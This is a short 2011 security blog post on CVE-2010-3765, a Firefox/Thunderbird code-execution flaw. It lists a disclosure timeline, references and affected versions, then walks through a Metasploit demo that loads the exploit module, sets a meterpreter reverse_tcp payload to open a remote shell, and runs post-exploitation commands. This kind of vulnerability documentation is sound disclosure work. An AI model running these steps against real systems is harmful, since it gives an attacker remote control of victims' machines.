
Published on February 19th, 2011


CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit




Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang

Timeline :
Vulnerability discovered in the wild
Vulnerability corrected by vendor on 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown on 2010-10-29
Metasploit PoC released on 2011-02-17

PoC provided by:
unknown
scriptjunkie

Reference(s) :
CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected versions :
All Firefox 3.6.x versions prior to 3.6.12
All Firefox 3.5.x versions prior to 3.5.15
All Thunderbird 3.1.x versions prior to 3.1.6
All Thunderbird 3.0.x versions prior to 3.0.10
All SeaMonkey 2.0.x versions prior to 2.0.10

Tested on Windows XP SP3 with Firefox 3.6.9, released on 2010-09-23





Description :
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a Metasploit port of the in-the-wild exploit.

Metasploit demo :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig


2011-02-19 09:13:04
